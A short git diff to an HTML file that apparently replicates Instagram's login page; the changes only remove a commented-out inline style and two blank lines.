--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <!DOCTYPE html>
-<html lang="en" class="js not-logged-in client-root js-focus-visible sDN5V" style="/* --desktop-nav-height:60px; */">
+<html lang="en" class="js not-logged-in client-root js-focus-visible sDN5V">
 <head>
     <meta charset="UTF-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
@@ -11,7 +11,6 @@
     <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
     <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@300;400&display=swap" rel="stylesheet">
     <link href="login.css?ver=1" rel="stylesheet">
-
     <title>Instagram</title>
 </head>
 <body>
@@ -306,7 +305,6 @@
                 </div>
             </footer>
         </section>
-    
     </div>
     <!-- <script type="text/javascript" src="loginPhoto.js"></script> -->
     <script type="text/javascript" src="login.js"></script>
